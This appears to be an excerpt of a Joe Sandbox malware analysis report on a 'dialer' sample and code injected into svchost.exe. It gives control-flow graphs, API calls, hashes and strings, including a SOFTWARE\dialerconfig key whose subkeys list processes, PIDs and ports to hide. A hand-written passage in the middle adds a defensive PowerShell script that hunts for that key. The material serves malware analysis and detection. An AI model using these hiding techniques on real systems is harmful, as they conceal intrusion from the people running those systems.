                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: malloc
                                                        • String ID: \\a$!X\a$&X\a$>X\a$BX\a$FX\a$\BaseNamedObjects\prjkgwzjfpu$^X\a
                                                        • API String ID: 2803490479-1613850753
                                                        • Opcode ID: e16301037b0d77bcd467e7990bc76fc6cf491eb5b6aa7b9b1d04fdc29e4fd107
                                                        • Instruction ID: 9393264c7fefb4ea2be71b53204916b8babecb6f49fba4aadedb5818e0271d31
                                                        • Opcode Fuzzy Hash: e16301037b0d77bcd467e7990bc76fc6cf491eb5b6aa7b9b1d04fdc29e4fd107
                                                        • Instruction Fuzzy Hash: 0B719FB67106108BE756EF76A8107AA7792F34CBC8F048218FF0A673A5EB35D8418741

                                                        Control-flow Graph

                                                        control_flow_graph for 0x140001ba0 (rendered as text; legend and edge list omitted): basic blocks from 0x140001ba0 through 0x140001d38; calls VirtualQuery, VirtualProtect, memcpy, GetLastError and the internal functions 0x1400023b0, 0x1400024d0 and 0x140001d40.
                                                        APIs
                                                        • VirtualQuery.KERNEL32(?,?,?,?,0000000140007DE8,0000000140007DE8,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                        • VirtualProtect.KERNEL32(?,?,?,?,0000000140007DE8,0000000140007DE8,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                        • memcpy.MSVCRT ref: 0000000140001CE0
                                                        • GetLastError.KERNEL32(?,?,?,?,0000000140007DE8,0000000140007DE8,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000041.00000002.2793358303.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000041.00000002.2793262142.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000041.00000002.2793499216.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000041.00000002.2793677289.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000041.00000002.2793804607.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                        • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                        • API String ID: 2595394609-2123141913
                                                        • Opcode ID: b222b55c204ee79bf3a6796a364817026853a656d4fde43e0f58adcb2d31a576
                                                        • Instruction ID: 5a1f3230e6b093fb794165155096e8c5f6a4272005de43de0888e77419c50878
                                                        • Opcode Fuzzy Hash: b222b55c204ee79bf3a6796a364817026853a656d4fde43e0f58adcb2d31a576
                                                        • Instruction Fuzzy Hash: E54132B1601A4486FA66DF57F884BE927A0F78DBC4F554126EF0E877B1DA38C586C700

                                                        Control-flow Graph

                                                        control_flow_graph for 0x140002104 (rendered as text; legend and edge list omitted): basic blocks from 0x140002104 through 0x140002280; calls EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, TlsGetValue, GetLastError and free.
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000041.00000002.2793358303.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000041.00000002.2793262142.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000041.00000002.2793499216.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000041.00000002.2793677289.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000041.00000002.2793804607.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                        • String ID:
                                                        • API String ID: 3326252324-0
                                                        • Opcode ID: 7fb37bf835227b833910ad0b3ca45fd1501cef95afb7d6058d68c1c103ef5548
                                                        • Instruction ID: 15eab80a9bed3770a061dd569a1ee204bed2693b300b41cb500e06475ae20a9f
                                                        • Opcode Fuzzy Hash: 7fb37bf835227b833910ad0b3ca45fd1501cef95afb7d6058d68c1c103ef5548
                                                        • Instruction Fuzzy Hash: 0821F5B1305A1192FA6BDB53F9483E823A4BB6CBD0F444121FF5A476B4DB79C986C300

                                                        Control-flow Graph

                                                        control_flow_graph for 0x140001e10 (rendered as text; legend and edge list omitted): basic blocks from 0x140001e10 through 0x140001f69; calls signal at three sites and the internal function 0x140006c00.
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000041.00000002.2793358303.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000041.00000002.2793262142.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000041.00000002.2793499216.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000041.00000002.2793677289.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000041.00000002.2793804607.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CCG
                                                        • API String ID: 0-1584390748
                                                        • Opcode ID: 5ef3a62ee765a1df1a1f27c3b1b84fcb72e3878a555015f6c2828a79b2353043
                                                        • Instruction ID: 6ceb1774513a96d490965431a2b85a641fdade9f6b2d570d4bac0a3159b1485b
                                                        • Opcode Fuzzy Hash: 5ef3a62ee765a1df1a1f27c3b1b84fcb72e3878a555015f6c2828a79b2353043
                                                        • Instruction Fuzzy Hash: 22214CB1B0150582FA77DA2BF5903F91192ABCC7E4F258535FF59473F5DE3888828241

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 660 140001880-14000189c 661 1400018a2-1400018f9 call 140002420 call 140002660 660->661 662 140001a0f-140001a1f 660->662 661->662 667 1400018ff-140001910 661->667 668 140001912-14000191c 667->668 669 14000193e-140001941 667->669 670 14000194d-140001954 668->670 671 14000191e-140001929 668->671 669->670 672 140001943-140001947 669->672 675 140001956-140001961 670->675 676 14000199e-1400019a6 670->676 671->670 673 14000192b-14000193a 671->673 672->670 674 140001a20-140001a26 672->674 673->669 677 140001b87-140001b98 call 140001d40 674->677 678 140001a2c-140001a37 674->678 679 140001970-14000199c call 140001ba0 675->679 676->662 680 1400019a8-1400019c1 676->680 678->676 681 140001a3d-140001a5f 678->681 679->676 684 1400019df-1400019e7 680->684 687 140001a7d-140001a97 681->687 685 1400019e9-140001a0d VirtualProtect 684->685 686 1400019d0-1400019dd 684->686 685->686 686->662 686->684 690 140001b74-140001b82 call 140001d40 687->690 691 140001a9d-140001afa 687->691 690->677 697 140001b22-140001b26 691->697 698 140001afc-140001b0e 691->698 701 140001b2c-140001b30 697->701 702 140001a70-140001a77 697->702 699 140001b5c-140001b6c 698->699 700 140001b10-140001b20 698->700 699->690 704 140001b6f call 140001d40 699->704 700->697 700->699 701->702 703 140001b36-140001b57 call 140001ba0 701->703 702->676 702->687 703->699 704->690
                                                        APIs
                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000041.00000002.2793358303.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000041.00000002.2793262142.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000041.00000002.2793499216.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000041.00000002.2793677289.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000041.00000002.2793804607.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                        • API String ID: 544645111-395989641
                                                        • Opcode ID: 7818cc2df225a017ff44da82892a3b8f66bcfae0520395024c1ab092e30cd3b9
                                                        • Instruction ID: 78106683dca420d487733eb45b5c7fb140555e26720c20ee5b0ca44718aa059e
                                                        • Opcode Fuzzy Hash: 7818cc2df225a017ff44da82892a3b8f66bcfae0520395024c1ab092e30cd3b9
                                                        • Instruction Fuzzy Hash: F05105B6B11544DAEB16CF67F840BD82761A759BE8F548211FB19077B4DB38C586C700

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 708 140001800-140001810 709 140001812-140001822 708->709 710 140001824 708->710 711 14000182b-140001867 call 140002290 fprintf 709->711 710->711
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000041.00000002.2793358303.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000041.00000002.2793262142.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000041.00000002.2793499216.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000041.00000002.2793677289.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000041.00000002.2793804607.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: fprintf
                                                        • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                        • API String ID: 383729395-3474627141
                                                        • Opcode ID: b42aeac11d05b8ea25802da21c5bcc675e4d545df447c9ba059f3bdc1807f998
                                                        • Instruction ID: d95ce6b0039aa860daeef9cca60753270dd6df5ba42e2edc4f3d8be758d16bb5
                                                        • Opcode Fuzzy Hash: b42aeac11d05b8ea25802da21c5bcc675e4d545df447c9ba059f3bdc1807f998
                                                        • Instruction Fuzzy Hash: DFF09671A14A4482E612EF6AB9417ED6361E75D7C1F50D211FF4DA76A1DF3CD182C310

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 714 14000219e-1400021a5 715 140002272-140002280 714->715 716 1400021ab-1400021c2 EnterCriticalSection 714->716 717 140002265-14000226c LeaveCriticalSection 716->717 718 1400021c8-1400021d6 716->718 717->715 719 1400021e9-1400021f5 TlsGetValue GetLastError 718->719 720 1400021f7-1400021fa 719->720 721 1400021e0-1400021e7 719->721 720->721 722 1400021fc-140002209 720->722 721->717 721->719 722->721
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000041.00000002.2793358303.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000041.00000002.2793262142.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000041.00000002.2793499216.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000041.00000002.2793677289.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000041.00000002.2793804607.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                        • String ID:
                                                        • API String ID: 682475483-0
                                                        • Opcode ID: 87f9ce1bbc68f519e9da004e6316be91bec518300aea1fdf9716aad2947da55c
                                                        • Instruction ID: 8e95c5bf1582c2fa6f49c61d441952bd59d504a178f2dce2e4bc026802320bcf
                                                        • Opcode Fuzzy Hash: 87f9ce1bbc68f519e9da004e6316be91bec518300aea1fdf9716aad2947da55c
                                                        • Instruction Fuzzy Hash: 6501F2B5305A0082FA2BDB53FE083D82364BB6CBD0F454021EF0943AB4DB79C996C300

                                                        Execution Graph

                                                        Execution Coverage:56.2%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:87.5%
                                                        Total number of Nodes:8
                                                        Total number of Limit Nodes:1

                                                        Callgraph

                                                        • Executed
                                                        • Not Executed
                                                        • Opacity -> Relevance
                                                        • Disassembly available
                                                        callgraph 0 Function_0000000140846321 1 Function_00000001408460B2 2 Function_00000001408460F0 2->0 2->1 3 Function_0000000140846070 3->2

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 1408460f0-1408460f3 1 1408460fd-140846101 0->1 2 140846103-14084610b 1->2 3 14084610d 1->3 2->3 4 1408460f5-1408460fa 3->4 5 14084610f-140846112 3->5 4->1 6 14084611b-140846122 5->6 8 140846124-14084612c 6->8 9 14084612e 6->9 8->9 10 140846114-140846119 9->10 11 140846130-140846133 9->11 10->6 12 140846135-140846143 11->12 13 14084614e-140846150 11->13 15 140846145-14084614a 12->15 16 14084619d-1408461bc 12->16 17 140846152-140846158 13->17 18 14084615a 13->18 20 140846184-140846187 15->20 22 14084614c 15->22 19 1408461ed-1408461f0 16->19 17->18 18->20 21 14084615c-140846160 18->21 25 1408461f5-1408461fb 19->25 26 1408461f2-1408461f3 19->26 33 140846189-140846198 call 1408460b2 20->33 23 140846162-140846168 21->23 24 14084616a 21->24 22->21 23->24 24->20 27 14084616c-140846173 24->27 30 140846202-140846206 25->30 28 1408461d4-1408461d8 26->28 44 140846175-14084617b 27->44 45 14084617d 27->45 31 1408461be-1408461c1 28->31 32 1408461da-1408461dd 28->32 34 140846208-140846220 LoadLibraryA 30->34 35 14084625e-140846266 30->35 31->25 36 1408461c3 31->36 32->25 39 1408461df-1408461e3 32->39 33->1 41 140846222-140846229 34->41 38 14084626a-140846273 35->38 43 1408461c4-1408461c8 36->43 46 140846275-140846277 38->46 47 1408462a2-140846302 VirtualProtect * 2 call 140846321 38->47 39->43 48 1408461e5-1408461ec 39->48 41->30 42 14084622b 41->42 50 140846237-14084623f 42->50 51 14084622d-140846235 42->51 43->28 52 1408461ca-1408461cc 43->52 44->45 45->27 53 14084617f-140846182 45->53 54 140846279-140846288 46->54 55 14084628a-140846298 46->55 60 140846307-14084630c 47->60 48->19 57 140846241-14084624d GetProcAddressForCaller 50->57 51->57 52->28 58 1408461ce-1408461d2 52->58 53->33 54->38 55->54 59 14084629a-1408462a0 55->59 61 140846258 ExitProcess 57->61 62 14084624f-140846256 57->62 58->28 58->32 59->54 63 140846311-140846316 60->63 62->41 63->63 64 140846318 63->64
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000042.00000002.2793385319.0000000140840000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000042.00000002.2793218527.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000042.00000002.2793385319.0000000140001000.00000040.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000042.00000002.2793385319.00000001404DC000.00000040.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000042.00000002.2793385319.0000000140500000.00000040.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000042.00000002.2793385319.0000000140503000.00000040.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000042.00000002.2793385319.000000014078B000.00000040.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000042.00000002.2793385319.000000014080D000.00000040.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000042.00000002.2797364580.0000000140847000.00000004.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_66_2_140000000_dialer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ProtectVirtual$AddressCallerLibraryLoadProc
                                                        • String ID:
                                                        • API String ID: 1941872368-0
                                                        • Opcode ID: a1a6b93e84e87096e5dff681e67215abf906e06b78acd350537f386d013f0bde
                                                        • Instruction ID: 1d24a93eb9004fb9ff5f788f669610d725ede0fbeb3cf7fc7a03e9414d8a6cfe
                                                        • Opcode Fuzzy Hash: a1a6b93e84e87096e5dff681e67215abf906e06b78acd350537f386d013f0bde
                                                        • Instruction Fuzzy Hash: FE611A32F4026255EB274BB6AF843E87751931D7B4F49433DCB79423E6FA7488668B02

                                                        Execution Graph

                                                        Execution Coverage:0.7%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:66
                                                        Total number of Limit Nodes:2
                                                        execution_graph 14720 1fb5399273c 14722 1fb5399276a 14720->14722 14721 1fb53992858 LoadLibraryA 14721->14722 14722->14721 14723 1fb539928d4 14722->14723 14724 1fb539c1abc 14729 1fb539c1628 GetProcessHeap HeapAlloc 14724->14729 14726 1fb539c1ad2 Sleep SleepEx 14727 1fb539c1acb 14726->14727 14727->14726 14728 1fb539c1598 StrCmpIW StrCmpW 14727->14728 14728->14727 14773 1fb539c1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14729->14773 14731 1fb539c1650 14774 1fb539c1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14731->14774 14733 1fb539c1661 14775 1fb539c1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14733->14775 14735 1fb539c166a 14776 1fb539c1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14735->14776 14737 1fb539c1673 14738 1fb539c168e RegOpenKeyExW 14737->14738 14739 1fb539c18a6 14738->14739 14740 1fb539c16c0 RegOpenKeyExW 14738->14740 14739->14727 14741 1fb539c16e9 14740->14741 14742 1fb539c16ff RegOpenKeyExW 14740->14742 14777 1fb539c12bc RegQueryInfoKeyW 14741->14777 14744 1fb539c173a RegOpenKeyExW 14742->14744 14745 1fb539c1723 14742->14745 14747 1fb539c1775 RegOpenKeyExW 14744->14747 14748 1fb539c175e 14744->14748 14786 1fb539c104c RegQueryInfoKeyW 14745->14786 14752 1fb539c1799 14747->14752 14753 1fb539c17b0 RegOpenKeyExW 14747->14753 14751 1fb539c12bc 16 API calls 14748->14751 14754 1fb539c176b RegCloseKey 14751->14754 14755 1fb539c12bc 16 API calls 14752->14755 14756 1fb539c17d4 14753->14756 14757 1fb539c17eb RegOpenKeyExW 14753->14757 14754->14747 14758 1fb539c17a6 RegCloseKey 14755->14758 14759 1fb539c12bc 16 API calls 14756->14759 14760 1fb539c1826 RegOpenKeyExW 14757->14760 14761 1fb539c180f 14757->14761 14758->14753 14765 1fb539c17e1 RegCloseKey 14759->14765 14763 1fb539c184a 14760->14763 14764 1fb539c1861 RegOpenKeyExW 14760->14764 14762 1fb539c104c 6 API calls 14761->14762 14766 1fb539c181c RegCloseKey 14762->14766 14767 1fb539c104c 6 API calls 14763->14767 14768 1fb539c1885 14764->14768 14769 1fb539c189c RegCloseKey 14764->14769 14765->14757 14766->14760 14770 1fb539c1857 RegCloseKey 14767->14770 14771 1fb539c104c 6 API calls 14768->14771 14769->14739 14770->14764 14772 1fb539c1892 RegCloseKey 14771->14772 14772->14769 14773->14731 14774->14733 14775->14735 14776->14737 14778 1fb539c1327 GetProcessHeap HeapAlloc 14777->14778 14779 1fb539c148a RegCloseKey 14777->14779 14780 1fb539c1476 GetProcessHeap HeapFree 14778->14780 14781 1fb539c1352 RegEnumValueW 14778->14781 14779->14742 14780->14779 14782 1fb539c13a5 14781->14782 14782->14780 14782->14781 14784 1fb539c13d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14782->14784 14785 1fb539c141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 14782->14785 14791 1fb539c152c 14782->14791 14784->14785 14785->14782 14787 1fb539c11b5 RegCloseKey 14786->14787 14789 1fb539c10bf 14786->14789 14787->14744 14788 1fb539c10cf RegEnumValueW 14788->14789 14789->14787 14789->14788 14790 1fb539c114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14789->14790 14790->14789 14792 1fb539c1546 14791->14792 14795 1fb539c157c 14791->14795 14793 1fb539c1565 StrCmpW 14792->14793 14794 1fb539c155d StrCmpIW 14792->14794 14792->14795 14793->14792 14794->14792 14795->14782

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 106492572-2879589442
                                                        • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction ID: 3bf4cfb0a07fb8a34a3f598bc96345aa7c46004167599278be6342a6ae7bd595
                                                        • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction Fuzzy Hash: 4E7138B631AA5686FB109F66E8C16E923A6FB84B88F485521DE4F47B78DF3CC444C344
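The execution graph and strings above show what the code recovered from the svchost.exe dump does: it opens SOFTWARE\dialerconfig, then each of eight subkeys (paths, pid, process_names, service_names, startup, tcp_local, tcp_remote, udp), enumerates every value under them with RegQueryInfoKeyW and RegEnumValueW, copies the data to the heap, and later matches names against those lists with StrCmpIW/StrCmpW. The PowerShell hunt below is an added example written for this report, not code from Joe Sandbox or from the sample. It assumes the key lives under HKLM or HKCU (the report does not show which root key RegOpenKeyExW receives, so both are checked) and that an analyst may instead point it at a SOFTWARE hive loaded offline with reg.exe; the PID cross-check is a heuristic of mine, not behaviour the report documents.

```powershell
# Hunt for the configuration key read by the code recovered from the svchost.exe dump.
# Added example for this report; not part of Joe Sandbox or the sample.
# Assumptions (not shown in the report): the key lives under HKLM or HKCU, and the
# subkey names are exactly the eight strings recovered from the function.

$ConfigSubPath   = 'SOFTWARE\dialerconfig'
$ExpectedSubkeys = 'paths','pid','process_names','service_names','startup',
                   'tcp_local','tcp_remote','udp'

function Get-DialerConfig {
    [CmdletBinding()]
    param(
        # Root of a SOFTWARE hive mounted offline, e.g. 'HKLM:\OfflineSW' after
        # reg.exe load HKLM\OfflineSW C:\evidence\SOFTWARE. When set, only that hive is read.
        [string]$OfflineHiveRoot
    )

    # An offline SOFTWARE hive is mounted at its own root, so the key sits directly beneath it.
    $candidates = if ($OfflineHiveRoot) {
        @(Join-Path $OfflineHiveRoot 'dialerconfig')
    } else {
        @("HKLM:\$ConfigSubPath", "HKCU:\$ConfigSubPath")
    }

    foreach ($keyPath in $candidates) {
        if (-not (Test-Path -LiteralPath $keyPath)) { continue }
        Write-Warning "Config key present: $keyPath"

        # Walk the eight subkeys the code enumerates and emit every value under each.
        foreach ($name in $ExpectedSubkeys) {
            $subPath = Join-Path $keyPath $name
            if (-not (Test-Path -LiteralPath $subPath)) { continue }
            $sub = Get-Item -LiteralPath $subPath
            foreach ($valueName in $sub.GetValueNames()) {
                [pscustomobject]@{
                    Key       = $keyPath
                    List      = $name
                    ValueName = $valueName
                    Data      = $sub.GetValue($valueName)
                    Kind      = $sub.GetValueKind($valueName)
                }
            }
        }
    }
}

function Test-HiddenPids {
    # Heuristic (my assumption, not from the report): a PID listed under 'pid' that
    # Get-Process cannot see has either exited or is being hidden from the caller.
    param([object[]]$Findings)
    $visible = (Get-Process).Id
    foreach ($f in ($Findings | Where-Object List -eq 'pid')) {
        $pidValue = 0
        if ([int]::TryParse([string]$f.Data, [ref]$pidValue)) {
            [pscustomobject]@{
                ConfiguredPid       = $pidValue
                VisibleToGetProcess = ($visible -contains $pidValue)
            }
        }
    }
}

$findings = @(Get-DialerConfig)
$findings | Format-Table -AutoSize
Test-HiddenPids -Findings $findings | Format-Table -AutoSize
```

Because the dump that contains this code comes from a running svchost.exe, registry and process views obtained on the live host are only as trustworthy as that process; for evidence, copy the SOFTWARE hive from a clean boot or a volume shadow copy, mount it with reg.exe load on an uninfected machine, and run Get-DialerConfig -OfflineHiveRoot 'HKLM:\OfflineSW'. The values under tcp_local, tcp_remote and udp are the ones to compare against the host's real listener and connection tables from the same clean vantage point.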

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction ID: 18ea53aa43a98f725242ccc54522eb2a995cd4f0bc6055a6e4289cc5d1fcdbce
                                                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction Fuzzy Hash: E111A1F161E24B82F760ABA1F8C53F96397A788344F9C41349A4B817B6EF7DC044C600

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 000001FB539C1628: GetProcessHeap.KERNEL32 ref: 000001FB539C1633
                                                          • Part of subcall function 000001FB539C1628: HeapAlloc.KERNEL32 ref: 000001FB539C1642
                                                          • Part of subcall function 000001FB539C1628: RegOpenKeyExW.ADVAPI32 ref: 000001FB539C16B2
                                                          • Part of subcall function 000001FB539C1628: RegOpenKeyExW.ADVAPI32 ref: 000001FB539C16DF
                                                          • Part of subcall function 000001FB539C1628: RegCloseKey.ADVAPI32 ref: 000001FB539C16F9
                                                          • Part of subcall function 000001FB539C1628: RegOpenKeyExW.ADVAPI32 ref: 000001FB539C1719
                                                          • Part of subcall function 000001FB539C1628: RegCloseKey.ADVAPI32 ref: 000001FB539C1734
                                                          • Part of subcall function 000001FB539C1628: RegOpenKeyExW.ADVAPI32 ref: 000001FB539C1754
                                                          • Part of subcall function 000001FB539C1628: RegCloseKey.ADVAPI32 ref: 000001FB539C176F
                                                          • Part of subcall function 000001FB539C1628: RegOpenKeyExW.ADVAPI32 ref: 000001FB539C178F
                                                          • Part of subcall function 000001FB539C1628: RegCloseKey.ADVAPI32 ref: 000001FB539C17AA
                                                          • Part of subcall function 000001FB539C1628: RegOpenKeyExW.ADVAPI32 ref: 000001FB539C17CA
                                                        • Sleep.KERNEL32 ref: 000001FB539C1AD7
                                                        • SleepEx.KERNELBASE ref: 000001FB539C1ADD
                                                          • Part of subcall function 000001FB539C1628: RegCloseKey.ADVAPI32 ref: 000001FB539C17E5
                                                          • Part of subcall function 000001FB539C1628: RegOpenKeyExW.ADVAPI32 ref: 000001FB539C1805
                                                          • Part of subcall function 000001FB539C1628: RegCloseKey.ADVAPI32 ref: 000001FB539C1820
                                                          • Part of subcall function 000001FB539C1628: RegOpenKeyExW.ADVAPI32 ref: 000001FB539C1840
                                                          • Part of subcall function 000001FB539C1628: RegCloseKey.ADVAPI32 ref: 000001FB539C185B
                                                          • Part of subcall function 000001FB539C1628: RegOpenKeyExW.ADVAPI32 ref: 000001FB539C187B
                                                          • Part of subcall function 000001FB539C1628: RegCloseKey.ADVAPI32 ref: 000001FB539C1896
                                                          • Part of subcall function 000001FB539C1628: RegCloseKey.ADVAPI32 ref: 000001FB539C18A0
                                                        Memory Dump Source
                                                        • Source File: 00000043.00000002.2797758710.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_67_2_1fb539c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$HeapSleep$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1534210851-0
                                                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction ID: 7138facc15c73e94db0cfb52103dedfc80ca7baf7500d53e4cc01c5e64d1c001
                                                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction Fuzzy Hash: 4C3180F520A64B51FF50AB26DAD13F953A6AB48BD0F0C54319E0B877BAEF2CC451C618

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
